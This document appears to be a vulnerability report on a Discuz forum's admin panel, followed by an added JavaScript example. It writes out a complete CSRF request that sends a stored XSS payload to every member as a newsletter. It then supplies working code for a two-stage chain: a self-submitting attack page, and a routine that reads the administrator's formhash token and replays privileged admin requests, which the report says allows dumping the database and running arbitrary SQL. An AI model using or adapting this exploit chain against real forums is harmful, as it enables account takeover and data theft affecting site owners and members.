<p>First, a CSRF:</p><p>URL: /admincp.php?action=members&operation=newsletter&username=%2A&uid=0&srchemail=&regdatebefore=&regdateafter=&postshigher=&postslower=&regip=&lastip=&lastvisitafter=&lastvisitbefore=&lastpostafter=&lastpostbefore=&birthyear=&birthmonth=&birthday=&lower[credits]=&lower[extcredits1]=&lower[extcredits2]=&higher[credits]=&higher[extcredits1]=&higher[extcredits2]=</p><p>POST body (note that formhash is empty: the request is accepted without the token, which is what makes it forgeable cross-site, and username=%2A selects every member as recipient):</p><p>formhash=&scrolltop=&anchor=&subject=%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&message=test&sendvia=pm&pertask=100&newslettersubmit=%E6%8F%90%E4%BA%A4</p><p>A simple POC, lines 1-20:</p><p data-indent="1"><img src="http://static.wooyun.org/wooyun/upload/201501/2318062027fbff59bda5a4a6128d4fc9329ce3ec.png" alt="1.png"><br></p><p>Submitted successfully:</p><p><img src="http://static.wooyun.org/wooyun/upload/201501/2318070322bd1e70c19c7314d6146d3e334300f5.png" alt="2.png" width="600"></p><p>The subject is rendered unescaped, so every front-end member who receives the message is hit by the stored XSS:</p><p><img src="http://static.wooyun.org/wooyun/upload/201501/23180735fff2838718cc68a78132a44237ec90a5.png" alt="3.png" width="600"></p><p>Now, how to exploit this XSS. It is actually easy: once our script runs in an administrator's session, any back-end operation only requires obtaining that administrator's formhash. The POC is lines 25-215:</p><p>Send that JS code to every forum member (including all administrators) through the CSRF above; as soon as an administrator views the message, the script can dump the database.<br>It can also execute arbitrary SQL:</p><p><img src="http://static.wooyun.org/wooyun/upload/201501/23183023479756dffd7d7d3c0c615158a2797b13.png" alt="5.png" width="600"></p><p><img src="http://static.wooyun.org/wooyun/upload/201501/23183109046c9bca94364ebb495b51a57b9a2feb.png" alt="6.png" width="600"></p>
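<p>The two stages described above, written out as an added example (this is not the report's own POC, whose listing is not reproduced on this page, and not Discuz code): stage one builds the cross-site request that plants the script in the newsletter subject using exactly the URL and POST fields given in the report; stage two shows what the injected script has to do once it runs in an administrator's browser, namely load an admincp page with the victim's cookies, pull the formhash out of it, and replay an admin POST carrying that token. The target host, the regexes used to locate the formhash in the page (a hidden <code>formhash</code> input or a <code>formhash=</code> query parameter), and the sample admin HTML are assumptions and constructed data; the network I/O is injected as functions so the whole thing runs offline under Node.</p>

```javascript
// Added example, not the original report's POC. Host, formhash regexes and
// the sample admin page below are assumptions / constructed test data.

// The admincp newsletter URL exactly as given in the report.
const NEWSLETTER_QUERY =
  '/admincp.php?action=members&operation=newsletter&username=%2A&uid=0' +
  '&srchemail=&regdatebefore=&regdateafter=&postshigher=&postslower=' +
  '&regip=&lastip=&lastvisitafter=&lastvisitbefore=&lastpostafter=' +
  '&lastpostbefore=&birthyear=&birthmonth=&birthday=' +
  '&lower[credits]=&lower[extcredits1]=&lower[extcredits2]=' +
  '&higher[credits]=&higher[extcredits1]=&higher[extcredits2]=';

// The POST fields from the report, in the same order. formhash is whatever
// the caller supplies: empty for the CSRF stage, the stolen token later.
function newsletterFields(formhash, subject, message) {
  return [
    ['formhash', formhash],
    ['scrolltop', ''],
    ['anchor', ''],
    ['subject', subject],
    ['message', message],
    ['sendvia', 'pm'],
    ['pertask', '100'],
    ['newslettersubmit', '提交'],
  ];
}

// application/x-www-form-urlencoded body; URLSearchParams produces the same
// %XX encoding the report shows (e.g. "(" -> %28, "/" -> %2F).
function newsletterBody(formhash, subject, message) {
  return new URLSearchParams(newsletterFields(formhash, subject, message)).toString();
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Stage 1: a self-submitting HTML page. The <script> subject is HTML-escaped
// inside the value attribute so the browser submits the literal string rather
// than executing it on the attacker's page.
function csrfPage(base, subject, message) {
  const inputs = newsletterFields('', subject, message)
    .map(([n, v]) => `<input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}">`)
    .join('\n    ');
  return `<html><body onload="document.forms[0].submit()">
  <form method="POST" action="${escapeHtml(base + NEWSLETTER_QUERY)}">
    ${inputs}
  </form>
</body></html>`;
}

// Stage 2a: locate the formhash in a fetched admincp page. Assumed locations:
// a hidden input named formhash (either attribute order) or a formhash=
// parameter in a link. Returns null when the page carries no token, which is
// what an XSS payload sees when the victim is not a logged-in administrator.
function extractFormhash(html) {
  const m =
    html.match(/name=["']formhash["'][^>]*value=["']([0-9A-Za-z]+)["']/i) ||
    html.match(/value=["']([0-9A-Za-z]+)["'][^>]*name=["']formhash["']/i) ||
    html.match(/[?&;]formhash=([0-9A-Za-z]+)/);
  return m ? m[1] : null;
}

// Stage 2b: the payload's core loop. getPage/postForm are injected so this
// runs offline; in the victim's browser they would be XMLHttpRequest or
// fetch() calls made with the victim's cookies (same origin, so no CORS).
function withAdminToken(getPage, postForm, path, fields) {
  const formhash = extractFormhash(getPage(path));
  if (!formhash) return null;
  const body = new URLSearchParams([['formhash', formhash], ...fields]).toString();
  return postForm(path, body);
}

// Constructed sample of what an admincp page might look like to the payload.
const SAMPLE_ADMIN_HTML = `<html><body>
<a href="admincp.php?action=logout&amp;formhash=a1b2c3d4">logout</a>
<form method="post" action="admincp.php?action=members&amp;operation=newsletter">
<input type="hidden" name="formhash" value="a1b2c3d4">
</form></body></html>`;
```

<p>With an empty formhash, <code>newsletterBody('', '&lt;script&gt;alert(/xss/);&lt;/script&gt;', 'test')</code> reproduces the report's POST body byte for byte, which is the request the CSRF page submits. <code>withAdminToken</code> is the part that turns the stored XSS into full admin control: the server does check formhash on the dangerous admincp actions, but a script running in the administrator's origin can simply read the token off any admincp page and include it, so the token offers no protection once XSS is present.</p>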